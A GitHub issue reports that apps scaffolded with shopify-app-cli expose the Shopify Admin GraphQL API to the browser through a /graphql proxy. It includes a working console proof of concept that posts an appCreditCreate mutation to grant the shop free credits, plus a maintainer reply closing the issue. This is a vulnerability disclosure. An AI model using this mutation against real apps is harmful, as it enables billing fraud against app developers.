Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Is exposing ApolloClient/Admin GraphQL API to the frontend a bad idea? #128

Closed
tolgap opened this issue Dec 9, 2019 · 1 comment
Closed

Is exposing ApolloClient/Admin GraphQL API to the frontend a bad idea? #128

tolgap opened this issue Dec 9, 2019 · 1 comment

Comments

@tolgap
Copy link

tolgap commented Dec 9, 2019
edited
Loading

Issue summary

Exposing ApolloClient in the frontend will allow a Shop of your paid app to edit their subscription lineitems or even give appcredits to themselves.

Expected behavior

A shop shouldn't be allowed to change their own subscription items, or give themselves appCredits.

Actual behavior

If I inspect the ApolloClient in my browser, I can notice that it does API calls to /graphql. If I start inspecting the queries that sent to /graphql, I can figure out that its using the GraphQL Admin API.

Through this, I can deduct that I will have full access to the current AppInstallation, all through my browser. Even just performing fetch('/graphql') in my JS console would allow me to alter my AppInstallation to be $0.01, or give myself credits through appCreditCreate mutation.

Steps to reproduce the problem

  1. Setup a new shopify node app with shopify-app-cli.
  2. Visit the URL and when you're greeted with the default welcome message
  3. Setup recurring billing using the docs
  4. Logout and log back in, you will be prompted to perform a test payment for your app
  5. Perform payment and you're redirected to the welcome page
  6. Open the JS console and run the following:

Reduced test case

let mutation = { query: "mutation appCreditCreate($description: String!, $amount: MoneyInput!) { appCreditCreate(description: $description, amount: $amount) { appCredit { id amount { currencyCode amount } } } }", variables: { description: "hackerman credit", amount: { amount: "14.99", currencyCode: "USD" }  } };
let response = await fetch('/graphql', {credentials: 'include', method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(mutation) });

console.log(await response.json());

Specifications

  • Browser: Firefox 71.0
  • Device: Macbook Pro
  • Operating System: OSX 10.13.6
@tolgap tolgap changed the title Is exposing ApolloClient to the frontend a bad idea? Is exposing ApolloClient/Admin GraphQL API to the frontend a bad idea? Dec 9, 2019
@katiedavis
Copy link
Contributor

Hi @tolgap, thanks for bringing this issue here.

We are looking into the issue opened in the proxy that you commented on and we're going to address it there. The proxy exposes the API to the FE.

Closing this for now, but I know you're tagged on the other issue so you can follow there.

@faizulho faizulho mentioned this issue Dec 20, 2023
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@tolgap @katiedavis